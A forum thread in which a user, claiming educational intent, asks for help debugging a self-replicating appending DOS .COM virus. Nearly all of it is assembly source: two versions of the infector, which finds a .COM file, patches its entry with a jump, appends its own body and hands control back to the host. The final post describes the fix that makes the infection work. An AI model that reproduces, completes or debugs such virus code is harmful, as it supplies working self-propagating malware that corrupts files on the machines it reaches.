  1. #1

    Infecting COM problem

    It's strictly educational and I mean no harm.
    The theory is the usual one for an appending .COM infector:
    1. find the first *.COM file in the current directory
    2. read its first four bytes
    3. store them
    4. replace them with a 3-byte near jump (E9 disp16) to the end of the file, plus a 1-byte virus signature
    5. append the virus body, restore the saved four bytes at 100h in memory and jump to 100h (hand control back to the host)

    Now the infected .COM does not seem to work: it prints the virus's "Hello World" string, but crashes right after that.
    The host file:
    Code:
    ; Minimal DOS .COM host used as the infection target in this thread.
    ; Behaviour: write the single character 'Z' with INT 21h/AH=02h, then
    ; terminate with INT 21h/AH=4Ch. Its first four bytes (mov ah,02h /
    ; mov dl,'Z', which encode as B4 02 B2 5A) are exactly what the
    ; infector below saves and later overwrites with its jump patch.
    DOS_INT        equ 21h          ; DOS service dispatcher
    DOS_PUTCHAR    equ 02h          ; AH: write the character in DL to stdout
    DOS_TERMINATE  equ 4Ch          ; AH: terminate process (AL = exit code)

    c_seg segment 'code'
    	org 100h                    ; .COM image: loaded at CS:0100h, CS=DS=ES
    	assume cs:c_seg, ds:c_seg, es:c_seg
    main proc near
    start:
    	mov ah, DOS_PUTCHAR
    	mov dl, 'Z'                 ; character to print
    	int DOS_INT
    	mov ah, DOS_TERMINATE       ; AL is left as DOS returned it, so the
    	int DOS_INT                 ; exit code is not set explicitly
    main endp
    c_seg ends
    end start
    This is the virus:
    Code:
    ; Post #1 version of the appending .COM infector.
    ; Flow: set DTA -> FindFirst '.\*.COM' -> open read/write -> read first 4
    ; bytes -> if byte 3 == 'Y' treat as already infected and exit -> else
    ; overwrite the first 4 bytes with E9 <disp16> 'Y' -> append this body ->
    ; copy the saved 4 bytes back over CS:0100h -> jmp 0100h.
    ; Every data reference is [bp + offset X]: bp holds the "delta offset",
    ; i.e. how far this copy sits from where it was assembled (0 when the
    ; dropper runs on its own, host-size dependent once appended to a host).
    ; NOTE(review): none of the INT 21h calls below checks CF, so a failed
    ; FindFirst/open/read/write is not detected and execution continues on
    ; a stale DTA and whatever AX/BX happen to hold.
    c_seg segment 'code'
    	org 100h
    	assume cs:c_seg
    main proc far
    start_:
    	
    	
    	mov ax, cs                 ; .COM image: make DS = ES = CS
    	mov ds, ax
    	mov es, ax
    	
    	
    	
    	call fals_proc             ; pushes the run-time address of fals_proc,
    	fals_proc proc             ; the empty proc that directly follows the call
    	fals_proc endp
    	pop bp                     ; bp = run-time address of fals_proc
    	sub bp, offset fals_proc   ; minus assembled address => bp = delta offset
    	
    	
    	
    	; set DTA so that FindFirst writes its record into our own buffer
    	mov ah, 1Ah
    	lea dx, [bp + offset DTA]
    	int 21h
    	
    	
    	; find first file matching '.\*.COM'
    	mov ah, 4eh
    	lea dx, [bp + offset first_file]
    	mov cx, 7                  ; attribute mask (7 = also read-only/hidden/system);
    	int 21h                    ; CX is also reused as the rep movsb count below
    
    	
    	; preparing full path: ".\" followed by the name from the DTA
    	lea di, [bp + offset file_name]
    	mov byte ptr[di], '.'
    	inc di
    	mov byte ptr[di], '\'
    	inc di
    
    	
    	lea si, [bp + offset DTA + 1Eh]   ; DTA+1Eh = ASCIIZ name of the found file
    	rep movsb                  ; NOTE(review): copies a fixed 7 bytes (the CX left over
    	                           ; from the attribute mask), not the name's real length;
    	                           ; only correct when the name plus its NUL fits in 7 bytes
    	mov byte ptr[di], 0
    	
    	
    	; open the target read/write (no CF check)
    	mov ah, 3Dh
    	mov al, 2
    	lea dx, [bp + offset file_name]
    	int 21h
    
    
    	; save handle: bx = handle returned in AX
    	push ax
    	;push ax
    	pop bx
    	;pop [bp + fHandle]
    
    	; read the first four bytes of the target into buffer (the bytes the
    	; jump patch will replace, and the bytes restored at 100h later)
    	mov ah, 3Fh
    	mov cx, 4
    	lea dx, [bp + offset buffer]
    	int 21h
    	
    	;==debug==
    	;mov ah, 02h
    	;mov dl, byte ptr[bp + offset buffer + 3]
    	;int 21h
    	
    	; infection marker check: byte 3 of the file == vir_sig means "already infected"
    	mov al, byte ptr[bp + offset buffer + 3]
    	mov dl, byte ptr [bp + offset vir_sig]
    	cmp al, dl
    	jne jmp_patchin_
    	mov ah, 3Eh                ; already infected: close the handle ...
    	int 21h
    	mov ah, 4ch                ; ... and terminate. NOTE(review): when this runs as an
    	int 21h                    ; appended copy, the host is never given control here
    	;==debug==	
    	
    	
    	jmp_patchin_:
    	; set file pointer to the beginning of the target
    	mov ax, 4200h
    	mov cx, 0
    	mov dx, 0
    	int 21h
    
    	; ===== the jump patch =====  builds E9 <disp16> 'Y' in jmp_patch
    	mov byte ptr[bp + jmp_patch], 0E9h
    	mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size (low word only, DTA+1Ah);
    	                                        ; NOTE(review): no check that size + body stays below the .COM 64K limit
    	sub ax, 3                  ; a near jmp at 100h is 3 bytes, so disp = size-3 lands
    	                           ; at 100h+size, i.e. where this body is appended
    	mov word ptr[bp + jmp_patch + 1], ax
    	mov al, vir_sig            ; NOTE(review): not delta-relative (compare the [bp + offset vir_sig]
    	                           ; read above): in an appended copy this reads the assembled
    	                           ; address inside the host, so the marker written is not 'Y'
    	                           ; and the check above will not recognise the file next time
    	mov byte ptr[bp + jmp_patch + 3], al
    	mov ah, 40h
    	mov cx, 4
    	lea dx, [bp + offset jmp_patch]
    	int 21h
    
    	
    
    	; append the virus: seek to end of file, then write start_ .. vir_sig
    	mov ax, 4202h
    	mov cx, 0
    	mov dx, 0
    	int 21h
    	
    	 
    	
    
    	mov ah, 40h
    	mov cx, offset vir_sig - offset start_   ; NOTE(review): this length excludes vir_sig
    	                                         ; itself, so the appended copy carries no marker byte
    	lea dx, [bp + offset start_]
    	int 21h
    	
    	; close the target
    	mov ah, 3Eh
    	int 21h
    
    	; restore: copy the saved 4 host bytes back over CS:0100h
    	mov cx, 4
    	lea si, [bp + offset buffer]
    	mov di, 100h               ; NOTE(review): in the dropper (bp = 0) start_ itself sits at
    	                           ; 100h (org 100h above), so this overwrites the virus's own
    	                           ; first instructions right before the jmp below
    	rep movsb
    	
    	mov ah, 09h                ; print "Hello World" before handing over
    	lea dx, [bp + offset infection]
    	int 21h
    	
    	mov ax, 0100h
    	jmp ax                     ; transfer to the (restored) entry point
    	
    	;quit_:
    	;	mov ah, 4ch
    	;	int 21h
    
    	DTA db 43 dup (?)          ; DOS find-file record (43 bytes)
    	first_file db '.\*.COM', 0 ; search pattern for FindFirst
    	file_name db 255 dup (?)   ; ".\" + found name, NUL-terminated
    	extra_buffer db 20 dup (?) ; unused in this version
    	fHandle    dw ?            ; unused in this version (the pop into it is commented out)
    	buffer     db 4 dup (?)    ; original first 4 bytes of the target
    	jmp_patch  db 4 dup (?)    ; E9 <disp16> 'Y'
    	file_len   db 2 dup (?)    ; unused
    	virus_len  dw ?            ; unused
    	infection  db "Hello World$"   ; printed via INT 21h/09h
    	vir_sig db 'Y'	           ; infection marker, written as byte 3 of the patch
    main endp
    c_seg ends
    end start_
    I'm at a loss — can someone please help? Thanks in advance.

  2. #2

    Re: Infecting COM problem

    OK, I have been able to solve that problem. But now there is another one: I can't hand control back to the original host program. Copying the 4 saved bytes back to 100h isn't working. I even appended the 4 bytes at the end of the file and then read them back from the file into 100h, with no success: the bytes read and the bytes written are completely different. Can anybody help?
    Code:
    ; Post #2 version of the appending .COM infector.
    ; Changes versus post #1: the whole image main .. end_vir (code AND data,
    ; so including buffer and vir_sig) is appended; the saved 4 host bytes are
    ; appended once more after it; an "already infected" file no longer ends
    ; the process when running inside a host (cmp bp,0) but falls into
    ; dispatcher_, which reopens the file, tries to re-read the saved bytes,
    ; copies buffer over CS:0100h and jumps there.
    ; bp is the delta offset (0 in the stand-alone dropper, host-size
    ; dependent once appended); all data is addressed as [bp + offset X].
    ; NOTE(review): no INT 21h call below checks CF, so a failed
    ; FindFirst/open/read/write is silently ignored.
    ; NOTE(review): as post #3 explains, the read into buffer further down
    ; destroys the saved host bytes that an appended copy carries in its own
    ; buffer field; see the notes at that read and at the restore.
    c_seg segment 'code'
    	org 100h
    	assume cs:c_seg
    main proc near
    start_:
    	; adjust the segments: .COM image, DS = ES = CS
    	mov ax, cs
    	mov ds, ax
    	mov es, ax
    	
    	; getting offsets: call/pop gives the run-time address of fals_proc,
    	; subtracting its assembled address leaves the delta offset in bp
    	call fals_proc
    	fals_proc proc
    	fals_proc endp
    	pop bp
    	sub bp, offset fals_proc
    	
    	; set DTA so that FindFirst writes its record into our own buffer
    	mov ah, 1Ah
    	lea dx, [bp + offset DTA]
    	int 21h
    	
    	
    	; find first file matching '.\*.COM' (no CF check)
    	mov ah, 4eh
    	lea dx, [bp + offset first_file]
    	mov cx, 7                  ; attribute mask (7 = also read-only/hidden/system);
    	int 21h                    ; CX is also reused as the rep movsb count below
    
    	; preparing full path: ".\" followed by the name from the DTA
    	lea di, [bp + offset file_name]
    	mov byte ptr[di], '.'
    	inc di
    	mov byte ptr[di], '\'
    	inc di
    
    	lea si, [bp + offset DTA + 1Eh]   ; DTA+1Eh = ASCIIZ name of the found file
    	rep movsb                  ; NOTE(review): fixed 7-byte copy (CX left over from the
    	                           ; attribute mask), not the name's real length
    	mov byte ptr[di], 0
    	
    	
    	; open the target read/write (no CF check)
    	mov ah, 3Dh
    	mov al, 2
    	lea dx, [bp + offset file_name]
    	int 21h
    
    
    	; save handle: bx = handle, and a copy into fHandle
    	push ax
    	push ax
    	pop bx
    	pop [bp + fHandle]         ; NOTE(review): fHandle is never read afterwards
    
    	; read the first four bytes of the target into buffer
    	; NOTE(review): in an appended copy, buffer still holds THIS host's saved
    	; bytes (the data area was written out together with the code below);
    	; this read replaces them with the found file's bytes, so the restore in
    	; dispatcher_ later uses the wrong 4 bytes -- the defect post #3 fixes by
    	; reading into a separate buffer
    	mov ah, 3Fh
    	mov cx, 4
    	lea dx, [bp + offset buffer]
    	int 21h
    	
    	; if the virus signature matches (byte 3 == vir_sig) don't infect, just quit
    	mov al, byte ptr[bp + offset buffer + 3]
    	mov dl, byte ptr [bp + offset vir_sig]
    	cmp al, dl
    	jne jmp_patchin_
    	mov ah, 3Eh                ; close the handle
    	int 21h
    	mov ah, 09h                ; print "Hello World"
    	lea dx, [bp + offset infection]
    	int 21h
    	cmp bp, 0                  ; stand-alone dropper: nothing to hand over to, exit
    	je quitzz_
    	jmp dispatcher_            ; appended copy: go and hand control to the host
    	quitzz_:
    	mov ah, 4ch
    	int 21h
    
    	jmp_patchin_:
    	; set file pointer to the beginning of the target
    	mov ax, 4200h
    	mov cx, 0
    	mov dx, 0
    	int 21h
    
    	; ===== the jump patch =====  builds E9 <disp16> 'Y' in jmp_patch
    	mov byte ptr[bp + jmp_patch], 0E9h
    	mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size (low word only, DTA+1Ah);
    	                                        ; NOTE(review): no check that size + body stays below the .COM 64K limit
    	sub ax, 3                  ; near jmp at 100h is 3 bytes: disp = size-3 lands at 100h+size
    	mov word ptr[bp + jmp_patch + 1], ax
    	mov al, vir_sig            ; NOTE(review): not delta-relative (compare the [bp + offset vir_sig]
    	                           ; read above): in an appended copy this reads the assembled
    	                           ; address inside the host, so the marker written is not 'Y'
    	                           ; and the infection check will not recognise the file next time
    	mov byte ptr[bp + jmp_patch + 3], al
    	mov ah, 40h
    	mov cx, 4
    	lea dx, [bp + offset jmp_patch]
    	int 21h
    
    	; append the virus: seek to end, then write main .. end_vir (code + data)
    	mov ax, 4202h
    	mov cx, 0
    	mov dx, 0
    	int 21h
    	
    	mov ah, 40h
    	mov cx, offset end_vir - offset main
    	lea dx, [bp + offset main]
    	int 21h
    	
    	; append the first 4 bytes once more, after the body
    	mov ax, 4202h
    	mov cx, 0
    	mov dx, 0
    	int 21h
    	
    	mov ah, 40h
    	lea dx, [bp + offset buffer]
    	mov cx, 4
    	int 21h
    	
    	mov ah, 3eh                ; close the target
    	int 21h
    
    	dispatcher_:
    	; reopen the found file (file_name, not necessarily the running host)
    	mov ah, 3Dh
    	mov al, 02h
    	lea dx, [bp + offset file_name]
    	int 21h
    	mov bx, ax
    	
    	mov ax, 4202h              ; seek 0 bytes from END: pointer is now at end-of-file
    	mov cx, 0
    	mov dx, 0
    	int 21h
    	
    	; restore the first 4 bytes: re-read them from the file tail
    	; NOTE(review): the pointer is at end-of-file, so this read presumably
    	; returns 0 bytes and buffer keeps whatever it already held (the found
    	; file's first 4 bytes from the read above, or the jump patch when that
    	; file was already infected) -- not the tail bytes the comment intends
    	mov ah, 3Fh
    	lea dx, [bp + offset buffer]
    	mov cx, 4
    	int 21h
    	
    	mov cx, 4
    	lea si, [bp + offset buffer]
    	mov di, 100h               ; NOTE(review): with bp = 0 (dropper), 100h is start_ itself
    	rep movsb                  ; and this overwrites the virus's own first instructions;
    	                           ; if buffer holds the E9 patch, the jmp below re-enters the
    	                           ; virus and loops (the symptom described in post #3)
    	
    	mov ah, 09h                ; print "Hello World"
    	lea dx, [bp + offset infection]
    	int 21h
    	
    
    	; debug: dump the 4 bytes now at 100h
    	mov di, 100h
    	mov cx, 4
    	loop_1:
    		mov ah, 02h
    		mov dl, byte ptr[di]   ; NOTE(review): di is never advanced, the same byte prints 4 times
    		
    		int 21h
    	loop loop_1
    
    	; debug: dump the 4 bytes in buffer
    	lea di, [bp + offset buffer]
    	mov cx, 4
    	loop_2:
    		mov ah, 02h
    		mov dl, byte ptr[di]   ; NOTE(review): same here, di is not advanced
    		int 21h
    	loop loop_2
    	;mov ah, 01
    	;int 21h
    	
    
    	; close the reopened file
    	mov ah, 3Eh
    	int 21h
    
    	mov ax, 0100h
    	jmp ax                     ; transfer to whatever now sits at 100h
    	
    	;quit_:
    	;	mov ah, 4ch
    	;	int 21h
    
    	DTA db 43 dup (?)          ; DOS find-file record (43 bytes)
    	first_file db '.\*.COM', 0 ; search pattern for FindFirst
    	file_name db 255 dup (?)   ; ".\" + found name, NUL-terminated
    	extra_buffer db 20 dup (?) ; unused in this version
    	fHandle    dw ?            ; written once, never read
    	buffer     db 4 dup (0)    ; saved first 4 bytes; travels with the appended copy
    	jmp_patch  db 4 dup (0)    ; E9 <disp16> 'Y'
    	infection  db "Hello World$"   ; printed via INT 21h/09h
    	vir_sig db 'Y'	           ; infection marker, byte 3 of the patch
    main endp
    	end_vir label near         ; end of the image that gets appended (main .. end_vir)
    c_seg ends
    end start_

  3. #3

    Resolved Re: Infecting COM problem

    Solved it. Here is what was happening:
    I saved the first 4 bytes of the host to `buffer`.
    When I then read 4 bytes to check for a prior infection, I read them into `buffer` again, so `buffer` now held the jump patch and the virus signature instead of the saved host bytes. At run time I then overwrote the first 4 bytes at 100h with `buffer` — i.e. with the jump patch — and jumped there, which re-entered the virus: an infinite loop. Reading the 4 bytes for the infection check into a separate buffer solved the problem. Thanks anyway.
